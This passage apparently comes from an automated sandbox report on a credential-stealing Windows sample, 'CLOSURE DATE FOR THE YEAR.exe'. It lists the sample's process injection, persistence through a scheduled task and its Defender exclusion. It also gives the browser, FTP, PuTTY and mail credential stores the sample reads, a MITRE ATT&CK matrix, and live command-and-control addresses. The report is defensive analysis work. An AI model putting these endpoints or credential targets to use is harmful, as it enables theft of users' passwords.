                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeQueries volume information: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformationJump to behavior
                Source: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformationJump to behavior
                Source: C:\Users\user\Desktop\CLOSURE DATE FOR THE YEAR.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior

                Stealing of Sensitive Information

                barindex
                Source: Yara matchFile source: 9.2.IOsbBBIDAm.exe.402bdc0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.IOsbBBIDAm.exe.4011da0.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1755400023.0000000003FB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1755400023.0000000003FD3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2068531815.000000000402B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2068531815.0000000004011000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1754216796.00000000028D6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: Process Memory Space: CLOSURE DATE FOR THE YEAR.exe PID: 7480, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 7996, type: MEMORYSTR
                Source: Yara matchFile source: Process Memory Space: IOsbBBIDAm.exe PID: 8056, type: MEMORYSTR
                Source: Yara matchFile source: dump.pcap, type: PCAP
                Source: Yara matchFile source: 00000008.00000002.2903142728.0000000001258000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\9bis.com\KiTTY\SessionsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Martin PrikrylJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login DataJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\HostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: HKEY_CURRENT_USER\Software\NCH Software\ClassicFTP\FTPAccountsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\SettingsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: HKEY_CURRENT_USER\Software\Far\Plugins\FTP\HostsJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\IncrediMail\IdentitiesJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\OutlookJump to behavior
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: PopPassword8_2_0040D069
                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeCode function: SmtpPassword8_2_0040D069
                Source: Yara matchFile source: 9.2.IOsbBBIDAm.exe.402bdc0.1.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 9.2.IOsbBBIDAm.exe.4011da0.2.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.RegSvcs.exe.400000.0.raw.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 8.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000000.00000002.1755400023.0000000003FB9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1755400023.0000000003FD3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2068531815.000000000402B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000009.00000002.2068531815.0000000004011000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                Source: Yara matchFile source: 00000000.00000002.1754216796.00000000028D6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
                Gather Victim Identity InformationAcquire InfrastructureValid Accounts1
                Scheduled Task/Job
                1
                Scheduled Task/Job
                1
                Access Token Manipulation
                1
                Masquerading
                2
                OS Credential Dumping
                121
                Security Software Discovery
                Remote Services1
                Email Collection
                1
                Encrypted Channel
                Exfiltration Over Other Network MediumAbuse Accessibility Features
                CredentialsDomainsDefault AccountsScheduled Task/Job1
                DLL Side-Loading
                311
                Process Injection
                11
                Disable or Modify Tools
                2
                Credentials in Registry
                1
                Process Discovery
                Remote Desktop Protocol1
                Archive Collected Data
                3
                Ingress Tool Transfer
                Exfiltration Over BluetoothNetwork Denial of Service
                Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
                Scheduled Task/Job
                41
                Virtualization/Sandbox Evasion
                Security Account Manager41
                Virtualization/Sandbox Evasion
                SMB/Windows Admin Shares2
                Data from Local System
                2
                Non-Application Layer Protocol
                Automated ExfiltrationData Encrypted for Impact
                Employee NamesVirtual Private ServerLocal AccountsCronLogin Hook1
                DLL Side-Loading
                1
                Access Token Manipulation
                NTDS1
                Application Window Discovery
                Distributed Component Object ModelInput Capture112
                Application Layer Protocol
                Traffic DuplicationData Destruction
                Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script311
                Process Injection
                LSA Secrets2
                File and Directory Discovery
                SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
                Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
                Deobfuscate/Decode Files or Information
                Cached Domain Credentials13
                System Information Discovery
                VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
                DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items3
                Obfuscated Files or Information
                DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
                Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job12
                Software Packing
                Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
                Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
                DLL Side-Loading
                /etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement
                Hide Legend

                Legend:

                • Process
                • Signature
                • Created File
                • DNS/IP Info
                • Is Dropped
                • Is Windows Process
                • Number of created Registry Values
                • Number of created Files
                • Visual Basic
                • Delphi
                • Java
                • .Net C# or VB.NET
                • C, C++ or other language
                • Is malicious
                • Internet
                behaviorgraph top1 signatures2 2 Behavior Graph ID: 1568026 Sample: CLOSURE DATE FOR THE YEAR.exe Startdate: 04/12/2024 Architecture: WINDOWS Score: 100 47 Suricata IDS alerts for network traffic 2->47 49 Found malware configuration 2->49 51 Malicious sample detected (through community Yara rule) 2->51 53 13 other signatures 2->53 7 CLOSURE DATE FOR THE YEAR.exe 7 2->7         started        11 IOsbBBIDAm.exe 4 2->11         started        process3 file4 37 C:\Users\user\AppData\...\IOsbBBIDAm.exe, PE32 7->37 dropped 39 C:\Users\...\IOsbBBIDAm.exe:Zone.Identifier, ASCII 7->39 dropped 41 C:\Users\user\AppData\Local\...\tmpB774.tmp, XML 7->41 dropped 43 C:\...\CLOSURE DATE FOR THE YEAR.exe.log, ASCII 7->43 dropped 55 Writes to foreign memory regions 7->55 57 Allocates memory in foreign processes 7->57 59 Adds a directory exclusion to Windows Defender 7->59 61 Injects a PE file into a foreign processes 7->61 13 RegSvcs.exe 140 7->13         started        17 powershell.exe 23 7->17         started        19 powershell.exe 23 7->19         started        21 schtasks.exe 1 7->21         started        63 Antivirus detection for dropped file 11->63 65 Multi AV Scanner detection for dropped file 11->65 67 Machine Learning detection for dropped file 11->67 23 schtasks.exe 11->23         started        25 WerFault.exe 11->25         started        signatures5 process6 dnsIp7 45 94.156.177.41, 49737, 49738, 49739 NET1-ASBG Bulgaria 13->45 69 Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc) 13->69 71 Tries to steal Mail credentials (via file registry) 13->71 73 Tries to steal Mail credentials (via file / registry access) 13->73 77 2 other signatures 13->77 75 Loading BitLocker PowerShell Module 17->75 27 conhost.exe 17->27         started        29 WmiPrvSE.exe 17->29         started        31 conhost.exe 19->31         started        33 conhost.exe 21->33         started        35 conhost.exe 23->35         started        signatures8 process9

                This section contains all screenshots as thumbnails, including those not shown in the slideshow.


                windows-stand
                SourceDetectionScannerLabelLink
                CLOSURE DATE FOR THE YEAR.exe39%ReversingLabsWin32.Trojan.Generic
                CLOSURE DATE FOR THE YEAR.exe47%VirustotalBrowse
                CLOSURE DATE FOR THE YEAR.exe100%AviraHEUR/AGEN.1357257
                CLOSURE DATE FOR THE YEAR.exe100%Joe Sandbox ML
                SourceDetectionScannerLabelLink
                C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe100%AviraHEUR/AGEN.1357257
                C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe100%Joe Sandbox ML
                C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe39%ReversingLabsWin32.Trojan.Generic
                No Antivirus matches
                No Antivirus matches
                SourceDetectionScannerLabelLink
                http://94.156.177.41/kings/five/fre.php0%Avira URL Cloudsafe
                94.156.177.41/kings/five/fre.php0%Avira URL Cloudsafe
                No contacted domains info
                NameMaliciousAntivirus DetectionReputation
                http://kbfvzoboss.bid/alien/fre.phpfalse
                  high
                  http://alphastand.top/alien/fre.phpfalse
                    high
                    http://alphastand.win/alien/fre.phpfalse
                      high
                      http://alphastand.trade/alien/fre.phpfalse
                        high
                        94.156.177.41/kings/five/fre.phptrue
                        • Avira URL Cloud: safe
                        unknown
                        http://94.156.177.41/kings/five/fre.phptrue
                        • Avira URL Cloud: safe
                        unknown
                        NameSourceMaliciousAntivirus DetectionReputation
                        http://www.apache.org/licenses/LICENSE-2.0CLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1759762063.0000000008DD2000.00000004.00000800.00020000.00000000.sdmpfalse
                          high
                          http://www.fontbureau.comCLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1759762063.0000000008DD2000.00000004.00000800.00020000.00000000.sdmpfalse
                            high
                            http://www.fontbureau.com/designersGCLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1759762063.0000000008DD2000.00000004.00000800.00020000.00000000.sdmpfalse
                              high
                              http://www.fontbureau.com/designers/?CLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1759762063.0000000008DD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                high
                                http://www.founder.com.cn/cn/bTheCLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1759762063.0000000008DD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                  high
                                  http://www.fontbureau.com/designers?CLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1759762063.0000000008DD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                    high
                                    http://www.ibsensoftware.com/RegSvcs.exe, RegSvcs.exe, 00000008.00000002.2902710643.0000000000400000.00000040.00000400.00020000.00000000.sdmp, IOsbBBIDAm.exe, 00000009.00000002.2068531815.000000000402B000.00000004.00000800.00020000.00000000.sdmp, IOsbBBIDAm.exe, 00000009.00000002.2068531815.0000000004011000.00000004.00000800.00020000.00000000.sdmpfalse
                                      high
                                      http://www.tiro.comCLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1759762063.0000000008DD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                        high
                                        http://www.fontbureau.com/designersCLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1759762063.0000000008DD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                          high
                                          http://www.goodfont.co.krCLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1759762063.0000000008DD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            high
                                            https://www.chiark.greenend.org.uk/~sgtatham/putty/0CLOSURE DATE FOR THE YEAR.exe, IOsbBBIDAm.exe.0.drfalse
                                              high
                                              http://www.carterandcone.comlCLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1759762063.0000000008DD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                high
                                                http://www.sajatypeworks.comCLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1759762063.0000000008DD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  high
                                                  http://www.typography.netDCLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1759762063.0000000008DD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                    high
                                                    http://www.fontbureau.com/designers/cabarga.htmlNCLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1759762063.0000000008DD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      high
                                                      http://www.founder.com.cn/cn/cTheCLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1759762063.0000000008DD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                        high
                                                        http://www.galapagosdesign.com/staff/dennis.htmCLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1759762063.0000000008DD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          high
                                                          http://www.founder.com.cn/cnCLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1759762063.0000000008DD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            high
                                                            http://www.fontbureau.com/designers/frere-user.htmlCLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1759762063.0000000008DD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              high
                                                              http://www.jiyu-kobo.co.jp/CLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1759762063.0000000008DD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                high
                                                                http://www.galapagosdesign.com/DPleaseCLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1759762063.0000000008DD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  high
                                                                  http://www.fontbureau.com/designers8CLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1759762063.0000000008DD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    high
                                                                    http://localhost/arkanoid_server/requests.phpIOsbBBIDAm.exe, 00000009.00000002.2066244082.00000000027D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                      high
                                                                      http://www.fonts.comCLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1759762063.0000000008DD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        high
                                                                        http://www.sandoll.co.krCLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1759762063.0000000008DD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                          high
                                                                          http://www.urwpp.deDPleaseCLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1759762063.0000000008DD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                            high
                                                                            http://www.zhongyicts.com.cnCLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1759762063.0000000008DD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              high
                                                                              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/nameCLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1754216796.00000000027E9000.00000004.00000800.00020000.00000000.sdmp, IOsbBBIDAm.exe, 00000009.00000002.2066244082.00000000027D9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                high
                                                                                http://www.sakkal.comCLOSURE DATE FOR THE YEAR.exe, 00000000.00000002.1759762063.0000000008DD2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  high
                                                                                  • No. of IPs < 25%
                                                                                  • 25% < No. of IPs < 50%
                                                                                  • 50% < No. of IPs < 75%
                                                                                  • 75% < No. of IPs
                                                                                  IPDomainCountryFlagASNASN NameMalicious
                                                                                  94.156.177.41
                                                                                  unknownBulgaria
                                                                                  43561NET1-ASBGtrue
                                                                                  Joe Sandbox version:41.0.0 Charoite
                                                                                  Analysis ID:1568026
                                                                                  Start date and time:2024-12-04 06:51:07 +01:00
                                                                                  Joe Sandbox product:CloudBasic
                                                                                  Overall analysis duration:0h 5m 40s
                                                                                  Hypervisor based Inspection enabled:false
                                                                                  Report type:full
                                                                                  Cookbook file name:default.jbs
                                                                                  Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                  Number of analysed new started processes analysed:20
                                                                                  Number of new started drivers analysed:0
                                                                                  Number of existing processes analysed:0
                                                                                  Number of existing drivers analysed:0
                                                                                  Number of injected processes analysed:0
                                                                                  Technologies:
                                                                                  • HCA enabled
                                                                                  • EGA enabled
                                                                                  • AMSI enabled
                                                                                  Analysis Mode:default
                                                                                  Analysis stop reason:Timeout
                                                                                  Sample name:CLOSURE DATE FOR THE YEAR.exe
                                                                                  Detection:MAL
                                                                                  Classification:mal100.troj.spyw.evad.winEXE@19/20@0/1
                                                                                  EGA Information:
                                                                                  • Successful, ratio: 100%
                                                                                  HCA Information:
                                                                                  • Successful, ratio: 96%
                                                                                  • Number of executed functions: 70
                                                                                  • Number of non-executed functions: 12
                                                                                  Cookbook Comments:
                                                                                  • Found application associated with file extension: .exe
                                                                                  • Exclude process from analysis (whitelisted): MpCmdRun.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                                                                                  • Excluded IPs from analysis (whitelisted): 104.208.16.94
                                                                                  • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, login.live.com, otelrules.azureedge.net, blobcollector.events.data.trafficmanager.net, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com, onedsblobprdcus16.centralus.cloudapp.azure.com
                                                                                  • Not all processes where analyzed, report is missing behavior information
                                                                                  • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                  • Report size getting too big, too many NtCreateKey calls found.
                                                                                  • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                  • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                  • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                  • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                  TimeTypeDescription
                                                                                  00:51:57API Interceptor1x Sleep call for process: CLOSURE DATE FOR THE YEAR.exe modified
                                                                                  00:52:04API Interceptor27x Sleep call for process: powershell.exe modified
                                                                                  00:52:07API Interceptor1x Sleep call for process: IOsbBBIDAm.exe modified
                                                                                  00:52:11API Interceptor60x Sleep call for process: RegSvcs.exe modified
                                                                                  00:52:36API Interceptor1x Sleep call for process: WerFault.exe modified
                                                                                  05:52:05Task SchedulerRun new task: IOsbBBIDAm path: C:\Users\user\AppData\Roaming\IOsbBBIDAm.exe
                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  94.156.177.41Order84746.exeGet hashmaliciousLokibotBrowse
                                                                                  • 94.156.177.41/davinci/five/fre.php
                                                                                  FVR-N2411-07396.exeGet hashmaliciousLokibot, PureLog StealerBrowse
                                                                                  • 94.156.177.41/soja/five/fre.php
                                                                                  Scan copy.exeGet hashmaliciousLokibot, PureLog StealerBrowse
                                                                                  • 94.156.177.41/simple/five/fre.php
                                                                                  file.exeGet hashmaliciousLokibotBrowse
                                                                                  • 94.156.177.41/maxzi/five/fre.php
                                                                                  Payment Advice.xlsGet hashmaliciousHTMLPhisher, LokibotBrowse
                                                                                  • 94.156.177.41/simple/five/fre.php
                                                                                  stthigns.docGet hashmaliciousLokibotBrowse
                                                                                  • 94.156.177.41/maxzi/five/fre.php
                                                                                  goodtoseeuthatgreatthingswithentirethingsgreatfor.htaGet hashmaliciousCobalt Strike, LokibotBrowse
                                                                                  • 94.156.177.41/maxzi/five/fre.php
                                                                                  PO-000041492.docx.docGet hashmaliciousLokibotBrowse
                                                                                  • 94.156.177.41/maxzi/five/fre.php
                                                                                  ECxDwGGFH3.exeGet hashmaliciousLokibotBrowse
                                                                                  • 94.156.177.41/simple/five/fre.php
                                                                                  greetingwithgreatthignsgivenbackwithentireprocessgivenmeback.htaGet hashmaliciousCobalt Strike, HTMLPhisher, LokibotBrowse
                                                                                  • 94.156.177.41/simple/five/fre.php
                                                                                  No context
                                                                                  MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                  NET1-ASBGSwiftSec.arm.elfGet hashmaliciousMiraiBrowse
                                                                                  • 93.123.85.8
                                                                                  SwiftSec.arm7.elfGet hashmaliciousMiraiBrowse
                                                                                  • 93.123.85.8
                                                                                  SwiftSec.x86.elfGet hashmaliciousMiraiBrowse
                                                                                  • 93.123.85.8
                                                                                  boatnet.ppc.elfGet hashmaliciousMiraiBrowse
                                                                                  • 93.123.85.24
